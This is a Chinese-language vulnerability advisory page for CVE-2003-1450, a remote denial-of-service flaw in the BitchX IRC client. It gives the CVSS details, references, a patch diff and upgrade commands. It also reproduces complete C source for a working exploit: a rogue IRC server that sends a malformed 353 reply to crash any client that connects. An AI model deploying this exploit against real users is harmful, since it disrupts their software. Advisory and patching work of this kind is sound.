CVE-2003-1450
CVSS5.0
发布时间 :2003-12-31 00:00:00
修订时间 :2008-09-05 16:36:58
NMCOE    

[原文]BitchX 75p3 and 1.0c16 through 1.0c20cvs allows remote attackers to cause a denial of service (segmentation fault) via a malformed RPL_NAMREPLY numeric 353 message.


[CNNVD]BitchX畸形RPL_NAMREPLY远程拒绝服务攻击漏洞(CNNVD-200312-359)

        
        BitchX是一款流行的IRC客户端,可使用在多种操作系统平台下,包括Linux和Windows。
        BitchX不正确处理部分包含RPL_NAMREPLY数字的回复,远程攻击者可以利用这个漏洞对BitchX进行拒绝服务攻击,使程序崩溃。
        发送畸形的包含RPL_NAMREPLAY数字353的回复应答给BitchX客户端,可导致BitchX崩溃。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-20 [输入验证不恰当]

- CPE (受影响的平台与产品)

cpe:/a:bitchx:bitchx:1.0_c16
cpe:/a:bitchx:bitchx:75p3
cpe:/a:bitchx:bitchx:1.0_c19
cpe:/a:bitchx:bitchx:1.0_c20cvs

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1450
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1450
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-359
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/11363
(UNKNOWN)  XF  bitchx-irc-namreply-dos(11363)
http://www.securityfocus.com/bid/6880
(UNKNOWN)  BID  6880
http://www.securityfocus.com/archive/1/312133
(UNKNOWN)  BUGTRAQ  20030217 [argv] BitchX-353 Vulnerability
http://www.linuxsecurity.com/content/view/104622/104/
(UNKNOWN)  GENTOO  200302-11
http://lists.grok.org.uk/pipermail/full-disclosure/2003-February/003850.html
(UNKNOWN)  FULLDISC  20030217 [argv] BitchX-353 Vulnerability
http://securityreason.com/securityalert/3279
(UNKNOWN)  SREASON  3279

- 漏洞信息

BitchX畸形RPL_NAMREPLY远程拒绝服务攻击漏洞
中危 输入验证
2003-12-31 00:00:00 2003-12-31 00:00:00
远程  
        
        BitchX是一款流行的IRC客户端,可使用在多种操作系统平台下,包括Linux和Windows。
        BitchX不正确处理部分包含RPL_NAMREPLY数字的回复,远程攻击者可以利用这个漏洞对BitchX进行拒绝服务攻击,使程序崩溃。
        发送畸形的包含RPL_NAMREPLAY数字353的回复应答给BitchX客户端,可导致BitchX崩溃。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * argv@hushmail.com提供了第三方补丁:
        - -----begin BitchX-1.0c20cvs-353.diff-----
        diff -Nru BitchX.orig/source/funny.c BitchX/source/funny.c
        - --- BitchX.orig/source/funny.c Sun Feb 16 18:34:16 2003
        +++ BitchX/source/funny.c Sun Feb 16 18:39:56 2003
        @@ -260,7 +260,10 @@
        type = Args[0];
        channel = Args[1];
        line = Args[2];
        - -
        + if (channel == NULL || line == NULL) {
        + bitchsay("Invalid number of arguments for ", __FUNCTION__);
        + return;
        + }
        ptr = line;
        while (*ptr)
        {
        - -----end BitchX-1.0c20cvs-353.diff-----
        厂商补丁:
        BitchX
        ------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Gentoo Linux用户建议运行'net-irc/bitchx'的用户使用如下命令进行升级:
        emerge sync
        emerge -u bitchx
        emerge clean

- 漏洞信息 (22259)

BitchX 1.0 Malformed RPL_NAMREPLY Denial Of Service Vulnerability (EDBID:22259)
linux dos
2003-01-30 Verified
0 argv
N/A [点击下载]
source: http://www.securityfocus.com/bid/6880/info

It has been reported that BitchX does not properly handle some types of replies contained in the RPL_NAMREPLY numeric. When a malformed reply is received by the client, the client crashes, resulting in a denial of service. 

/*
 * bitchx-353.c
 * --argv
 * Jan/30/03
 *
 * Vulnerable:
 *      BitchX-75p3
 *      BitchX-1.0c16
 *      BitchX-1.0c19
 *      BitchX-1.0c20cvs
 *
 * Not Vulnerable:
 *      BitchX-1.0c18   (So far..)
 *
 *
 *  Workaround:
 *      in function funny_namreply()
 *      after the PasteArgs(Args, 2);
 *      add in
 *      -- snip --
 *      if (Args[1] == NULL || Args[2] == NULL)
 *                      return;
 *      -- unsnip --
 *
 * ---- the vuln code of bx -----
 *       PasteArgs(Args, 2);
 *       type = Args[0];
 *       channel = Args[1];
 *       line = Args[2];
 *
 *       ptr = line;
 *       while (*ptr)
 *       {
 *               while (*ptr && (*ptr != ' '))
 *                       ptr++;
 *               user_count++;
 *               while (*ptr && (*ptr == ' '))
 *                       ptr++;
 *       }
 * ------------------------------
 *
 * [panasync(panasync@colossus.melnibone.org)] you would hope the irc server would be a trusted source.
 * [hellman(hellman@ipv6.gi-1.au.reroute.se)] 'Free porn at /server irc.owned.com'
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

static char shellcode[] = ":* 353 * =  :\n";    // <-- this could be something worse.

int acceptConnection(int fd)
{
   char *ip_addr;
   int descriptor, sal;
   struct sockaddr_in sa;
   sal = sizeof(sa);
   descriptor = accept(fd, (struct sockaddr *) &sa, &sal);
   if (descriptor >= 0) {
      ip_addr = inet_ntoa(sa.sin_addr);
      printf("Connection from %s:%d\n", ip_addr, ntohs(sa.sin_port));
   }
   return descriptor;
}


int main(int argc, char **argv)
{
   int sock, serv, port;
   struct sockaddr_in server;

   port = 6667;

   if (argc > 1)
        port = atoi(argv[1]);

   memset(&server, 0, sizeof(server));
   server.sin_port = htons(port);
   server.sin_family = AF_INET;
   server.sin_addr.s_addr = INADDR_ANY;

   sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
   setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &serv, sizeof(int));

   if (bind(sock, (struct sockaddr *) &server, sizeof(struct sockaddr_in))
       == -1) {
      return 0;
   }

   listen(sock, 1);

   while (1) {
      serv = acceptConnection(sock);
      write(serv, shellcode, strlen(shellcode));
      close(serv);
   }
   return 0;
}
		

- 漏洞信息

60186
BitchX IRC Client RPL_NAMREPLY Message Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public Uncoordinated Disclosure

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-02-17 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站